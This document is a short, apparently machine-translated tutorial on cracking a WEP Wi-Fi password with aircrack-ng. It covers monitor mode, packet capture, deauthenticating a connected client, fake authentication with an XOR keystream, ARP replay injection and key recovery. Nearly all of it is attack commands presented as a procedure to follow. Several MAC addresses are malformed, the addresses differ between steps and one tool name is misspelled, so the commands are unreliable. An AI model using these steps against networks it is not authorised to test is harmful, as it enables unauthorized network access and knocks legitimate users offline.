The first step: enter the Monitor mode
airmon-ng # to view the current use of wireless LAN
airmon-ng check # View may affect wireless scanning process
airmon-ng check kill # closed may affect wireless scanning process
airmon-ng start wlan0 # use wlan0 enter Monitor mode
Use iwconfig command to check whether the item wlanmon the Mode switch to Monitor mode
Step Two: Start packet capture and save
airodump-ng wlan0mon -c 1 --bssid 00: 11: 22: 33: 44: 55 -w wep.cap # - bssid listening device designated MAC is designated channel -c -w monitor packet writing the file
The third step: Deauthentication fetch file XOR (wireless router device has been connected)
Send cancellation packet interrupt device (cell phone, laptop, etc.) is now connected with AP (router), allowing the device to reconnect again
aireplay-ng -0 1 -a EC: 26: CADC: 29: B6 -c 08: 57: 00: 0C: 96: 68 wlan0mon # -0 interrupt instruction 1 -a attempt to cut off the router's mac -c wireless LAN MAC address apart from the wireless device using wlan0mon
Description XOR keystream appears successfully acquired files:
Step Four: Using XOR file associated with AP
airreplay-ng -1 60 -e TP_LINK7301 -y wep-01-80-89-17-1E-2B-44.xor -a 00: 11: 22: 33: 44: 55 -h 66: 77: 55: 33 : 22: 11 wlan0mon # -1 plurality AP -y stream file association key re-associate -e specified time associated directory listing (ls command to view captured file) -a reproducing address STA (s on the route MAC address) -h own MAC address of the wireless network card wireless card used in the current wlan0mon
Step five: Perform ARP replay
aireplay-ng -3 -b EC: 26: CADC: 29: B6 -h 66: 77: 55: 33: 22: 11 wlan0mon # -3 arp -b specified replay attack to attack their own wireless network card address of the AP -h wlan0mon use the MAC address of the current wireless network card
Step Six: Deauthentication trigger ARP packet (new interrupt command input window)
aireplay-ng -0 1 -a EC: 26: CADC: 29: B6 -c 08: 57: 00: 0C: 96: 68 wlan0mon # -0 interrupt instruction 1 -a attempt to cut off the router's mac -c wireless LAN MAC address apart from the wireless device using wlan0mon
After reconnection interrupted, ARP packets will be crawled
Step Seven: Password appears after collecting enough DATA (can open new windows side edge packet capture analysis)
aircrack-ng wep-01.cap # of packet capture file for analysis
The resulting Password: